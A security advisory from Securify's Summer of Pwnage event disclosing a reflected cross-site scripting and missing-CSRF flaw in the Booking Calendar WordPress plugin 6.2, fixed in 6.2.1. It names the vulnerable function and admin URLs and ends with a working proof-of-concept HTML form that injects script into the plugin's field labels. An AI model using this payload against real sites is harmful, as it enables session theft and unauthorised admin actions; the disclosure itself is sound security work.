A Cross-Site Scripting vulnerability was found in the Booking Calendar WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE-20160714-0003
These issues were successfully tested on Booking Calendar WordPress Plugin version 6.2.
This issue is resolved in Booking Calendar version 6.2.1.
The Booking Calendar WordPress Plugin is a booking system for online reservation and availability checking service for your site. A Reflected Cross-Site Scripting vulnerability exists in the Booking Calendar WordPress plugin. This vulnerability allows an attacker to perform any action with the privileges of the target user. The affected code is not protected with an anti-Cross-Site Request Forgery token. Consequently, it can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement).
The vulnerability exists in the wpdev_bk_settings_form_labels() function from booking/lib/wpdev-settings-general.php (line 1492).
All input field on the Booking > Settings > Fields page are vulnerable to Cross-Site Scripting, eg http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=form.
Also all the form from the Booking > Settings > Import tab are vulnerable to Cross-Site Scripting, however a valid anti-CSRF token in this tab is required, eg http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=sync.
<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking-option&tab=form" method="POST">
<input type="hidden" name="booking_form_field_label1" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="booking_form_field_label2" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="booking_form_field_label3" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="booking_form_field_label6" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="booking_form_field_values6" value="" />
<input type="hidden" name="booking_form_field_label4" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="booking_form_field_active4" value="On" />
<input type="hidden" name="booking_form_field_label5" value=""><script>alert(document.domain)</script>" />
<input type="hidden" name="Submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
